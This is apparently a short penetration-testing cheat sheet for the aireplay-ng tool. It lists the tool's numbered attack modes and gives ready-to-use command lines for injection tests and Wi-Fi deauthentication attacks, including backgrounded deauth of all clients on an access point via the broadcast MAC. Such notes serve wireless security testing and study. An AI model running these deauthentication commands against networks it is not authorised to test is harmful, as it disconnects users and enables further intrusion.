Aireplay-ng (Generate-Traffic)
Post

Aireplay-ng (Generate-Traffic)

Aireplay-ng

Aireplay-ng is primarily useful for generating wireless traffic.

Aireplay-ng supports the following attacks. They are listed along with the corresponding number from the tool’s documentation.

ATTACKATTACK NAME
0Deauthentication
1Fake Authentication
2Interactive Packet Replay
3ARP Request Replay Attack
4KoreK ChopChop Attack
5Fragmentation Attack
6Café-Latte Attack
7Client-Oriented Fragmentation Attack
8WPA Migration Mode Attack
9Injection Test
1
2
3
4
5
# check if we can inject invisible APs. The injection test measures ping response times to the AP
sudo aireplay-ng -9 wlan0mon 

# check if we can inject in a specific AP
sudo aireplay-ng -e <ap_name> -a <MAC> wlan0mon

Deauthentication Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# deauth a client (1000000 is a large number of packets, to keep the deauth attack working for a while):
sudo aireplay-ng -0 10 -a <bssid> -c <client_MAC> wlan0mon

# To background the command and don't see output
sudo aireplay-ng --deauth 10 -a <bssid> -c <client_MAC> wlan0mon &> /dev/null &

# To deauth every client connected to a BSSID don't specify a client <MAC>
aireplay-ng --deauth 4 -a <bssid> wlan0mon &> /dev/null &

# Can be done as well by using broadcast MAC "FF:FF:FF:FF:FF:FF" 
aireplay-ng --deauth 4 -a <bssid> -c FF:FF:FF:FF:FF:FF wlan0mon

# Same as above, but without expecting to receive probes
sudo aireplay-ng -e <ap_name> -a <MAC> -D wlan0mon

# if we have two wifi cards, wlan0mon and wlan1mon, card-to-card test, to make sure they can inject. if it says (5/7 error, still can be used to attack an AP)
sudo aireplay-ng -9 -i wlan1mon wlan0mon

Pro Tips

1
2
3
4
5
6
7
8
# with "jobs" we can see the jobs backgrounded with &. each has an ID
jobs

# kill all backgrounded aireplay processes.
killall aireplay-ng 

# kill only the first process in the "jobs" list:
kill %1